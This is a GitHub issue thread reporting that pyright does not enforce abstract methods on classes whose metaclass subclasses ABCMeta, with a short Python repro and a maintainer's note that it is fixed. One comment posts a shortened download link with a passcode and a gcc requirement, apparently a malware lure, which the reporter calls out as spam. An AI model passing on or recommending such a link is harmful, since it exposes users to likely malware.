### ISSUE TITLE
Custom ABCMeta subclasses do not trigger abstract detection upon subsequent instantiation or @final

### ISSUE THREAD

**Issue by JacobHayes** [microsoft/pyright#8910]
**Describe the bug**
When subclassing `ABCMeta`, the resulting classes using the custom metaclass are no longer checked for abstract-ness when marked `@final` or upon instantiation. I first noticed this with `pydantic`, which has [a metaclass](https://github.com/pydantic/pydantic/blob/97d357f50a6e8f2a5129a2061887a9c124f7c9c3/pydantic/_internal/_model_construction.py#L81) that extends `ABCMeta` (and then used [here](https://github.com/pydantic/pydantic/blob/97d357f50a6e8f2a5129a2061887a9c124f7c9c3/pydantic/main.py#L80)), but it works with a pretty minimal repro.

I tried to look for a related issue, but the closest I found was https://github.com/microsoft/pyright/issues/4925 where `ABCMeta` wasn't actually causal.

**Code or Screenshots**
```python
from abc import ABCMeta, abstractmethod
from typing import final

class A(metaclass=ABCMeta):
    @abstractmethod
    def abstract(self):
        pass

@final
class B(A):  # Errors, correctly
    pass

B()  # Errors, correctly

class CustomMeta(ABCMeta):
    pass

class CustomA(metaclass=CustomMeta):
    @abstractmethod
    def abstract(self):
        pass

@final
class CustomB(CustomA):  # *Does not error*
    pass

CustomB()  # *Does not error*
```

**VS Code extension or command-line**
```sh
$ pyright --version
pyright 1.1.379
```

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by JacobHayes** [comment]
> This might help you ... You must have gcc compiler installed

This is obviously malicious spam (see the other dup comments across various projects within a minute of opened issues: https://github.com/search?q=is%3Aissue%20commenter%3Aw2wewwww&type=issues)

**Comment by erictraut** [comment]
This is addressed in pyright 1.1.380.
